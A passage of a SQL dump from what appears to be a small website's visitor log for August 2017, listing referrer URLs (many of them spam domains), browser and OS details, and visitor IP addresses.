,'2017-08-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(8419,'2017-08-04','http://zphiblgz.org/contact/','Firefox','Windows','27.0','','155.133.82.64','000',3,0),(8420,'2017-08-04','http://pc-services.ru/','MSIE','Windows','6.0','','46.118.112.220','000',3,0),(8421,'2017-08-04','http://zphiblgz.org','Firefox','Windows','40.1','','167.250.179.19','000',1,0),(8422,'2017-08-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.5','000',1,0),(8423,'2017-08-04','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','91.234.35.30','000',1,0),(8424,'2017-08-04','http://zphiblgz.org','Firefox','Windows','40.1','','112.198.103.35','000',2,0),(8425,'2017-08-04','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.214.213','000',4,0),(8426,'2017-08-04','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.4','000',1,0),(8427,'2017-08-04','http://zphiblgz.org','Firefox','Windows','40.1','','158.140.180.104','000',2,0),(8428,'2017-08-04','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.201.15','000',1,0),(8429,'2017-08-04','http://stroyplus.ru/','MSIE','Windows','4.01','','188.163.72.17','000',2,0),(8430,'2017-08-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.190.23','000',2,0),(8431,'2017-08-04','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(8432,'2017-08-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.92.43','000',2,0),(8433,'2017-08-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.165','000',2,0),(8434,'2017-08-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.56','000',13,0),(8435,'2017-08-04','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',3,0),(8436,'2017-08-04','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(8437,'2017-08-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.181.113.61','000',1,0),(8438,'2017-08-04','http://zphiblgz.org','python-requests','Unknown','2.13.0','','194.54.148.8','000',1,0),(8439,'2017-08-04','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','178.137.154.138','000',3,0),(8440,'2017-08-04','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','141.123.243.105','000',2,0),(8441,'2017-08-04','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','216.19.209.241','000',1,0),(8442,'2017-08-04','http://shymkent.xkaz.org/','MSIE','Windows','6.0','','46.118.158.199','000',4,0),(8443,'2017-08-04','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',2,0),(8444,'2017-08-04','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.71.236.6','000',2,0),(8445,'2017-08-04','http://zphiblgz.org','Safari','iPhone','10.0','','71.121.204.212','000',3,0),(8446,'2017-08-04','http://zphiblgz.org','Firefox','Windows','40.1','','178.63.20.66','000',1,0),(8447,'2017-08-04','https://kursy-ege.ru/','MSIE','Windows','6.0','','188.163.72.17','000',3,0),(8448,'2017-08-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.140.161.62','000',1,0),(8449,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','69.162.143.208','000',2,0),(8450,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','199.19.74.26','000',2,0),(8451,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','69.162.131.130','000',2,0),(8452,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.40.8','000',2,0),(8453,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.45.80','000',2,0),(8454,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','173.234.37.153','000',2,0),(8455,'2017-08-04','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(8456,'2017-08-04','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','63.223.126.183','000',2,0),(8457,'2017-08-05','https://moje-recenze.cz/','MSIE','Windows','5.5','','188.163.72.17','000',5,0),(8458,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','117.222.203.128','000',2,0),(8459,'2017-08-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(8460,'2017-08-05','http://pochtovyi-index.ru/','MSIE','Windows','6.0','','46.118.112.220','000',4,0),(8461,'2017-08-05','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',1,0),(8462,'2017-08-05','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(8463,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','85.179.56.63','000',1,0),(8464,'2017-08-05','http://zphiblgz.org','MSIE','Windows','6.0','','185.82.217.137','000',1,0),(8465,'2017-08-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.82','000',3,0),(8466,'2017-08-05','https://stop-gepatit.te.ua/','Unknown','Unknown','Unknown','','178.137.4.41','000',3,0),(8467,'2017-08-05','http://www.shoppingmiracles.co.uk/','MSIE','Windows','6.0','','46.119.112.177','000',7,0),(8468,'2017-08-05','https://via-energy-order.com/','MSIE','Windows','6.0','','46.118.158.199','000',2,0),(8469,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','24.41.220.10','000',1,0),(8470,'2017-08-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.209.42.84','000',2,0),(8471,'2017-08-05','http://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.149.139.126','000',2,0),(8472,'2017-08-05','http://zphiblgz.org','Safari','iPhone','6.0','','106.38.241.144','000',1,0),(8473,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','2.51.84.182','000',1,0),(8474,'2017-08-05','http://zphiblgz.org','Firefox','Windows','30.0','','37.114.186.150','000',1,0),(8475,'2017-08-05','http://zphiblgz.org','Firefox','Windows','30.0','','116.97.192.17','000',1,0),(8476,'2017-08-05','http://zphiblgz.org','Firefox','Windows','30.0','','110.38.219.76','000',1,0),(8477,'2017-08-05','http://zphiblgz.org','Firefox','Windows','30.0','','202.137.155.216','000',5,0),(8478,'2017-08-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.117.194.229','000',1,0),(8479,'2017-08-05','http://zphiblgz.org','MSIE','Windows','11.0','','69.30.222.130','000',3,0),(8480,'2017-08-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.157.81.121','000',7,0),(8481,'2017-08-05','http://podshipniki-nsk.ru/','Opera','Windows','6.01','','178.137.4.41','000',3,0),(8482,'2017-08-05','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','79.170.44.111','000',1,0),(8483,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','151.66.134.16','000',2,0),(8484,'2017-08-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(8485,'2017-08-05','http://videochat.life/','Opera','Windows','9.0','','46.119.112.177','000',3,0),(8486,'2017-08-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.148','000',2,0),(8487,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','212.54.97.73','000',2,0),(8488,'2017-08-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(8489,'2017-08-05','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',3,0),(8490,'2017-08-05','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1504.pMfOmRt5ox73g93f_ZxLMIYFqla6eZMEPC6C1a1QxV1CcyqCUC3XnqXLL6JVEqb_.c404583d9111ebaff143db0e3c3f30cceb70ebc2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSm0zUTByWUxuSllzRHFDSm1JMVpoNHBfbkc5Tk41cjd3bzRoRU53LWZSMUR1RVVfdXBCaU1m&b64e=2&sign=b112f70df0a9264143e9b72df0dd2328&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrI8gFpHVNjkpgF_nPg2yyEss2VCytlGnRV0DMZc_d2sZ2XgeFl0pxoNK5VH9DRuGpGyvq2PD9HNm7pO-Q8PUQb3KAV5G-BK3K1sJgO18V4g_CjCzzuEDjM8CgLsXl9ipC&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntLtnC7Pt9AjPuo1sh6q22hDi0rvZPulijmEvgg1pQavWQ0NPG5ayBrFRYyD21EO2og&l10n=ru&cts=1501959336190&mc=3.12119932272','Firefox','Windows','53.0','','46.242.63.143','000',1,0),(8491,'2017-08-05','https://univerfiles.com/','Unknown','Unknown','Unknown','','46.118.112.220','000',3,0),(8492,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','46.99.152.5','000',1,0),(8493,'2017-08-05','https://www.google.com/','Chrome','Macintosh','59.0.3071.115','','75.64.84.175','000',1,0),(8494,'2017-08-05','http://www.zphibmaryland.org/chapters/','Chrome','Windows','59.0.3071.115','','100.15.167.225','000',3,0),(8495,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','41.205.24.240','000',1,0),(8496,'2017-08-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(8497,'2017-08-05','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1504.Cxzfd0J_cmJkKrb2lSUzylTwqLA0ofBRSpihhmNhRzXYJDPhMb0dATR_jgyDiDj5.2abcf841f45a9ebce6726d8f69b340d789cd06f7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSm0zUTByWUxuSllrOUpacS1Ka0lMenZxOHg5NXI3dk5KVGl0WVY3emxxY0hNOEduaTVtQW9F&b64e=2&sign=d3d241e53949fed777e7a1a4b8e1582e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7Jarr4NXBxWKP6XYcivW5-ekvWqdM0n2Hayrg66CjynXXl-YaCCIn3V3TCX39O8MXgOCXZKE1O49iO9JWPMDvJL8yjHYxpz_JLJ5s5ICAZdjdrgzbKhnWLsdYFw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXQCTkazkxt76tnxc5z0WxR_EV1gxwa7zWJwrUIkAJrcctKs3EcoGEnDmOtL9R-1qhRsG94J166aw&l10n=ru&cts=1501973752488&mc=5.80283293202','Firefox','Windows','53.0','','176.193.181.161','000',1,0),(8498,'2017-08-05','http://zphiblgz.org','Firefox','Macintosh','33.0','','107.173.184.190','000',2,0),(8499,'2017-08-05','https://www.google.com/','Safari','iPhone','10.0','','104.236.137.159','000',2,0),(8500,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.225.9','000',1,0),(8501,'2017-08-05','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(8502,'2017-08-05','http://zphiblgz.org','Firefox','Windows','40.1','','117.240.13.81','000',1,0),(8503,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.104.20','000',2,0),(8504,'2017-08-06','http://zphiblgz.org','Chrome','Windows','36.0.1985.143','','218.208.44.67','000',8,0),(8505,'2017-08-06','http://irkutsk.zrus.org/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(8506,'2017-08-06','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(8507,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','146.185.177.103','000',2,0),(8508,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','39.47.141.200','000',2,0),(8509,'2017-08-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(8510,'2017-08-06','http://zphiblgz.org','MSIE','Windows','6.0','','188.65.211.238','000',1,0),(8511,'2017-08-06','http://komp-pomosch.ru/','MSIE','Windows','5.5','','188.163.72.17','000',5,0),(8512,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','84.83.74.122','000',1,0),(8513,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.229','000',2,0),(8514,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','125.160.233.88','000',1,0),(8515,'2017-08-06','http://typer.one/','MSIE','Windows','6.0','','178.137.154.138','000',3,0),(8516,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','95.251.179.19','000',1,0),(8517,'2017-08-06','http://karaganda.xkaz.org/','MSIE','Windows','6.0','','46.118.158.199','000',5,0),(8518,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.34.237.101','000',2,0),(8519,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','114.134.184.79','000',2,0),(8520,'2017-08-06','http://zphiblgz.org','Safari','iPhone','10.0','','73.179.82.42','000',1,0),(8521,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','151.72.135.215','000',2,0),(8522,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.239.90.19','000',2,0),(8523,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.61.138.207','000',2,0),(8524,'2017-08-06','http://zphiblgz.org','Firefox','Windows','29.0','','85.203.106.6','000',2,0),(8525,'2017-08-06','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','46.252.205.154','000',1,0),(8526,'2017-08-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','66.33.192.180','000',8,0),(8527,'2017-08-06','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.111.104','000',1,0),(8528,'2017-08-06','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.161','000',1,0),(8529,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.50','000',2,0),(8530,'2017-08-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.38','000',1,0),(8531,'2017-08-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.33.5.110','000',4,0),(8532,'2017-08-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(8533,'2017-08-06','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(8534,'2017-08-06','http://zphiblgz.org','Firefox','Windows','28.0','','159.203.70.167','000',3,0),(8535,'2017-08-06','http://zphiblgz.org','Firefox','Windows','29.0','','159.203.70.167','000',2,0),(8536,'2017-08-06','http://zphiblgz.org','Safari','Macintosh','7.0.3','','159.203.70.167','000',1,0),(8537,'2017-08-06','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','159.203.70.167','000',1,0),(8538,'2017-08-06','http://zphiblgz.org','MSIE','Windows','10.0','','159.203.70.167','000',2,0),(8539,'2017-08-06','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','159.203.70.167','000',1,0),(8540,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','180.234.28.83','000',2,0),(8541,'2017-08-06','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','10.1.1','','68.133.2.143','000',2,0),(8542,'2017-08-06','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',1,0),(8543,'2017-08-06','http://demian.kz/','Opera','Windows','8.00','','46.119.112.177','000',2,0),(8544,'2017-08-06','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.22','000',1,0),(8545,'2017-08-06','http://03e.info/','MSIE','Windows','6.0','','46.118.112.220','000',3,0),(8546,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','179.252.243.205','000',1,0),(8547,'2017-08-06','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(8548,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','177.247.111.188','000',1,0),(8549,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','179.28.198.66','000',2,0),(8550,'2017-08-06','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','104.168.149.196','000',8,0),(8551,'2017-08-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.168.149.196','000',1,0),(8552,'2017-08-06','http://remontvsamare.su/','Opera','Windows','7.11','','46.119.112.177','000',2,0),(8553,'2017-08-06','http://chatroulette.si/','Opera','Windows','7.0','','46.119.112.177','000',1,0),(8554,'2017-08-06','http://zphiblgz.org','Firefox','Windows','40.1','','104.250.15.245','000',1,0),(8555,'2017-08-06','http://hannasolution.ru/','Opera','Windows','9.0','','46.118.158.199','000',2,0),(8556,'2017-08-07','http://zphiblgz.org','Firefox','Windows','40.1','','124.106.136.116','000',2,0),(8557,'2017-08-07','http://companies-catalog.com/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(8558,'2017-08-07','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','185.163.183.22','000',2,0),(8559,'2017-08-07','http://zphiblgz.org','Firefox','Windows','40.1','','187.122.125.174','000',2,0),(8560,'2017-08-07','http://weburok.com/','MSIE','Windows','6.0','','46.118.112.220','000',3,0),(8561,'2017-08-07','http://macrotek.ru/','MSIE','Windows','6.0','','46.118.158.199','000',3,0),(8562,'2017-08-07','https://venerologiya.com/','MSIE','Windows','6.0','','188.163.72.17','000',2,0),(8563,'2017-08-07','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','58.187.175.169','000',1,0),(8564,'2017-08-07','http://zphiblgz.org','Firefox','Windows','3.5.6','','78.85.249.142','000',1,0),(8565,'2017-08-07','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','54.218.94.28','000',1,0),(8566,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.11.147','000',2,0),(8567,'2017-08-07','http://zphiblgz.org','MSIE','Windows','6.0','','81.177.3.147','000',2,0),(8568,'2017-08-07','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','137.200.32.6','000',5,0),(8569,'2017-08-07','http://zphiblgz.org','Firefox','Windows','54.0','','204.126.132.241','000',2,0),(8570,'2017-08-07','http://zphiblgz.org','Firefox','Windows','40.1','','27.34.241.203','000',1,0),(8571,'2017-08-07','http://zphiblgz.org','Firefox','Windows','40.1','','47.31.4.48','000',2,0),(8572,'2017-08-07','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(8573,'2017-08-07','http://golos-semyonf20.tumblr.com/','Opera Next','Windows','44.0.2510.1449','','185.36.102.114','000',2,0),(8574,'2017-08-07','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','204.126.132.241','000',3,0),(8575,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.128.43.164','000',2,0),(8576,'2017-08-07','http://chatroulette.video/','Unknown','Unknown','Unknown','','46.119.112.177','000',1,0),(8577,'2017-08-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(8578,'2017-08-07','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(8579,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','81.171.19.32','000',2,0),(8580,'2017-08-07','http://zphiblgz.org','MSIE','Windows','6.01','','139.162.16.13','000',14,0),(8581,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.76','000',1,0),(8582,'2017-08-07','http://zphiblgz.org','Firefox','Windows','40.1','','108.193.164.140','000',1,0),(8583,'2017-08-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.54','000',1,0),(8584,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','96.64.149.101','000',2,0),(8585,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.79','000',2,0),(8586,'2017-08-07','https://mojpreskumanie.com/','MSIE','Windows','5.5','','188.163.72.17','000',3,0),(8587,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',2,0),(8588,'2017-08-07','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','178.137.154.138','000',3,0),(8589,'2017-08-07','http://zphiblgz.org','Chrome','Windows','50.0.2661.102','','188.165.164.208','000',4,0),(8590,'2017-08-07','http://kenspiro.com/','Chrome','Windows','50.0.2661.102','','145.239.62.133','000',2,0),(8591,'2017-08-07','http://www.phillongcareers.com/jobs/','Chrome','Windows','50.0.2661.102','','37.187.181.163','000',3,0),(8592,'2017-08-07','https://www.carverpump.com/product-line/850-series/','Chrome','Windows','50.0.2661.102','','164.132.188.228','000',2,0),(8593,'2017-08-07','https://jumpupandkissme.wordpress.com/faqs/','Chrome','Windows','50.0.2661.102','','145.239.62.134','000',1,0),(8594,'2017-08-07','https://www.neustadtprize.org/the-neustadt-prize/neustadt-finalists/','Chrome','Windows','50.0.2661.102','','164.132.188.195','000',4,0),(8595,'2017-08-07','http://kuningankab.go.id/sekilas-kuningan/lambang-daerah','Chrome','Windows','50.0.2661.102','','145.239.62.126','000',2,0),(8596,'2017-08-07','https://flyinginireland.com/links/','Chrome','Windows','50.0.2661.102','','79.137.116.223','000',2,0),(8597,'2017-08-07','http://nitw.ac.in/main/academics/centre-continuing-education','Chrome','Windows','50.0.2661.102','','164.132.210.76','000',1,0),(8598,'2017-08-07','http://kpe.utoronto.ca/sport-medicine/concussion-clinic','Chrome','Windows','50.0.2661.102','','164.132.188.192','000',2,0),(8599,'2017-08-07','http://hydratek.com/?p=38\\\\\\\'','Chrome','Windows','50.0.2661.102','','145.239.62.114','000',3,0),(8600,'2017-08-07','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.32.127.178','000',2,0),(8601,'2017-08-07','http://uc-ciee.org/library/1/nclked/exact/the-climate-imperative-and-innovative-behavior-encouraging-greater-advances-in/a/1/desc','Chrome','Windows','50.0.2661.102','','94.23.150.254','000',6,0),(8602,'2017-08-07','http://itsalaughproductions.wikia.com/wiki/','Chrome','Windows','50.0.2661.102','','164.132.188.194','000',2,0),(8603,'2017-08-07','http://www.clinica-vasculara.ro/wp-content/uploads/3-300x180@2x.png','Chrome','Windows','50.0.2661.102','','178.32.155.115','000',6,0),(8604,'2017-08-07','http://ijpes.com/article/getpdf/158','Chrome','Windows','50.0.2661.102','','178.32.155.114','000',3,0),(8605,'2017-08-07','http://drawger.com/robd?section=articles&article_id=15836','Chrome','Windows','50.0.2661.102','','79.137.116.227','000',2,0),(8606,'2017-08-07','http://murraychev.com/showroom/2017/Chevrolet/Trax/SUV/overview.htm','Chrome','Windows','50.0.2661.102','','145.239.62.139','000',2,0),(8607,'2017-08-07','https://www.developpez.net/forums/d1716543-m9517978/systemes/linux/shell-commandes-gnu/ps-options-processus-prog/','Chrome','Windows','50.0.2661.102','','79.137.116.213','000',3,0),(8608,'2017-08-07','http://bayofquinte.ca/tourism/mbq-tmt/','Chrome','Windows','50.0.2661.102','','178.32.155.125','000',8,0),(8609,'2017-08-07','http://sheltoncap.com/download_file/146/155/','Chrome','Windows','50.0.2661.102','','164.132.188.199','000',1,0),(8610,'2017-08-07','http://ijpes.com/article/getpdf/161','Chrome','Windows','50.0.2661.102','','145.239.62.135','000',2,0),(8611,'2017-08-07','https://pxmerweb01.merlot.org/merlot/materials.htm?keywords=&amp;anyKeyWords=true&amp;allKeyWords=false&amp;exactPhraseKeyWords=false&amp;title=&amp;url=&amp;description=&amp;community=&amp;category=&amp;cat1=-1&amp;language=&amp;materialType=Learning+Object+Repository&amp;technicalFormat=&amp;audience=&amp;lmsType=&amp;_c','Chrome','Windows','50.0.2661.102','','178.32.155.118','000',1,0),(8612,'2017-08-07','http://konecranes.com/equipment/mobile-harbor-cranes/model-5-mobile-harbor-cranes','Chrome','Windows','50.0.2661.102','','79.137.116.222','000',2,0),(8613,'2017-08-07','https://jumpupandkissme.files.wordpress.com/2014/09/sushi.jpg?w=759','Chrome','Windows','50.0.2661.102','','164.132.188.229','000',1,0),(8614,'2017-08-07','http://cagenmusic.com/chitarra/','Chrome','Windows','50.0.2661.102','','37.187.181.156','000',1,0),(8615,'2017-08-07','http://blackfalds.com/public/download/documents/15151','Chrome','Windows','50.0.2661.102','','79.137.116.224','000',2,0),(8616,'2017-08-07','http://mnartists.org/community?f%5B0%5D=user%253Aroles%3A4','Chrome','Windows','50.0.2661.102','','178.32.155.124','000',1,0),(8617,'2017-08-07','https://kenspiro.com/wp-content/uploads/bfi_thumb/dummy-transparent-n8pegqrmmx2zqljkw6avvp2u7p0ehzl7r3e7abcobo.png','Chrome','Windows','50.0.2661.102','','145.239.62.116','000',1,0),(8618,'2017-08-07','https://www.dioceseoftyler.org/youth/wp-content/plugins/featured-video-plus/js/jquery.fitvids.min.js?ver=master-2015-08\\\\\\\'','Chrome','Windows','50.0.2661.102','','164.132.188.227','000',4,0),(8619,'2017-08-07','http://ijpes.com/article/psychometric-properties-of-sleep-quality-scale-and-sleep-variables-questionnaire-in-turkish-student-sample','Chrome','Windows','50.0.2661.102','','178.32.155.116','000',2,0),(8620,'2017-08-07','http://aboutfilipinofood.com/ensaladang-pako/?share=linkedin','Chrome','Windows','50.0.2661.102','','145.239.62.122','000',5,0),(8621,'2017-08-07','http://marlborough.govt.nz/services/alerts?itemCategory=sports-ground','Chrome','Windows','50.0.2661.102','','145.239.62.123','000',1,0),(8622,'2017-08-07','http://blackfalds.com/public/download/documents/15159','Chrome','Windows','50.0.2661.102','','145.239.62.117','000',3,0),(8623,'2017-08-07','http://konecranes.com/equipment/agilon/production-assembly','Chrome','Windows','50.0.2661.102','','145.239.62.124','000',2,0),(8624,'2017-08-07','http://ijpes.com/article/getpdf/167','Chrome','Windows','50.0.2661.102','','79.137.116.214','000',4,0),(8625,'2017-08-07','http://boundless.utoronto.ca/our-supporters/','Chrome','Windows','50.0.2661.102','','164.132.210.83','000',3,0),(8626,'2017-08-07','http://boundless.utoronto.ca/our-supporters/donor-stories/','Chrome','Windows','50.0.2661.102','','145.239.62.121','000',1,0),(8627,'2017-08-07','http://sheltoncap.com/download_file/184/165/','Chrome','Windows','50.0.2661.102','','178.32.155.126','000',2,0),(8628,'2017-08-07','https://www.headaid.net/vestempcp/quickview/view/id/87','Chrome','Windows','50.0.2661.102','','145.239.62.115','000',4,0),(8629,'2017-08-07','https://www.google.com/','Firefox','Macintosh','54.0','','70.194.5.234','000',13,0),(8630,'2017-08-07','http://daviscountyutah.gov/clerk-auditor/about/meet-your-clerk-auditor','Chrome','Windows','50.0.2661.102','','79.137.116.226','000',4,0),(8631,'2017-08-07','http://nasi.org/research/2010/report-workers-compensation-benefits-coverage-costs-2008','Chrome','Windows','50.0.2661.102','','164.132.188.198','000',4,0),(8632,'2017-08-07','https://donate.utoronto.ca/mensvolleyball','Chrome','Windows','50.0.2661.102','','145.239.62.136','000',2,0),(8633,'2017-08-07','http://ihe.nl/alessandro-cattapan','Chrome','Windows','50.0.2661.102','','145.239.62.131','000',2,0),(8634,'2017-08-07','http://dioceseoftyler.org/images/listing/55.jpg?1502149575','Chrome','Windows','50.0.2661.102','','145.239.62.141','000',2,0),(8635,'2017-08-07','http://itreviewadd.ml/papers/free-download-online-bedtime-prayers-9780849977671-pdf.html','Chrome','Windows','50.0.2661.102','','79.137.116.212','000',2,0),(8636,'2017-08-07','http://njcounseling.org/index.php/our-conferences/njca-conferences/2016-conference/photo-gallery-2016-conference/file/IMG_3414%252Ejpg','Chrome','Windows','50.0.2661.102','','164.132.188.230','000',1,0),(8637,'2017-08-07','http://www.lowellschool.org/page/about/who-we-are/parent-community','Chrome','Windows','50.0.2661.102','','178.33.200.186','000',1,0),(8638,'2017-08-07','http://www.marybaldwin.edu/alumni/prospective-student-referral/','Chrome','Windows','50.0.2661.102','','145.239.62.144','000',2,0),(8639,'2017-08-07','http://cityofflint.com/?page_id=2417','Chrome','Windows','50.0.2661.102','','145.239.62.128','000',5,0),(8640,'2017-08-07','http://www.lowellschool.org/page/admissions/welcome-to-admissions','Chrome','Windows','50.0.2661.102','','164.132.210.72','000',3,0),(8641,'2017-08-07','https://video.fcatv.org/videoscategory/board-of-selectmen/page/2/','Chrome','Windows','50.0.2661.102','','164.132.210.79','000',6,0),(8642,'2017-08-07','https://wizzair.com/static/images/default-source/information-services-images/card-images/16y-sfvrsn-2a4cdc06_27-size-300_a14c22274aa186b3e38e9a30f58ac2f2.png','Chrome','Windows','50.0.2661.102','','79.137.116.215','000',1,0),(8643,'2017-08-07','http://www.lowellschool.org/page/programs/middle-school/resources--support-','Chrome','Windows','50.0.2661.102','','145.239.62.145','000',3,0),(8644,'2017-08-07','http://www.corkentertainment.ie/?p=8536\\\\\\\'','Chrome','Windows','50.0.2661.102','','164.132.210.80','000',2,0),(8645,'2017-08-07','http://itreviewadd.ml/papers/get-deep-water-sail-windjammers-pdf-by-harold-a-underhill-085174172x.html','Chrome','Windows','50.0.2661.102','','188.165.164.214','000',2,0),(8646,'2017-08-07','http://kirov.zrus.org/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(8647,'2017-08-07','http://dreamwellhomes.com/idx/mls-oc17181305-30355_benecia_avenue_laguna_niguel_ca_92677','C